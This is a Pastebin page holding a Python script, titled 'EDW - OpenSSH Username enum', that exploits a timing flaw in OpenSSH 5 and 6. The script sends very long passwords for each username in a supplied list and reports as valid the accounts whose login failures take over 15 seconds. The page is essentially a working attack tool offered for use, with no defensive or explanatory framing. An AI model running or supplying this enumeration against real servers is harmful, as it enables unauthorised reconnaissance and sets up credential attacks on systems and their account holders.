Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # EDW - OpenSSH Username enum
- import sys
- import paramiko
- import time
- import optparse
- import re
- import signal
- from socket import *
- p = optparse.OptionParser("usage: %prog host user", version="%prog 0.2")
- p.add_option("-H", "--host", dest="host", type="string", help="specify hostname to run on")
- p.add_option("-u", "--userfile", dest="user", type="string", help="file of usernames")
- p.add_option("-p", "--port", dest="port", type="int", default=22, help="port number, default is 22")
- (options, args) = p.parse_args()
- host = options.host
- user = options.user
- port = options.port
- passw = 'A'*39000
- def main():
- timeStart = timeDone = 0
- s = socket(AF_INET, SOCK_STREAM)
- s.connect((host, port))
- s.send("Cymru_am_byth")
- data = s.recv(1024)
- ndata = data.rstrip()
- if not re.search(r"-OpenSSH_(5|6)",data):
- print "This version (%s) is not vulnerable to the timing attack" %ndata
- s.close()
- exit()
- else:
- print "This version (%s) looks vulnerable, lets try......." %ndata
- s.close()
- try:
- u = open(user).read().splitlines()
- except IOError as e:
- print "I/O error({0}): {1}".format(e.errno, e.strerror)
- sys.exit()
- for n in u:
- try:
- ssh = paramiko.SSHClient()
- ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
- tstart = int(time.time())
- ssh.connect(host,username=n,password=passw,port=port)
- ssh.close()
- except paramiko.BadAuthenticationType, e:
- print e
- sys.exit(1)
- except paramiko.SSHException,e:
- tdone = int(time.time())
- tres = tdone-tstart
- if tres > 15:
- print "[*] User %s exists on %s - %i" %(n,host,tres)
- else:
- print "User %s does not exist on %s - %i" %(n,host,tres)
- def signal_handler(signal, frame):
- print "\nCtrl+C pressed.. aborting..."
- exit()
- if __name__ == '__main__':
- signal.signal(signal.SIGINT, signal_handler)
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement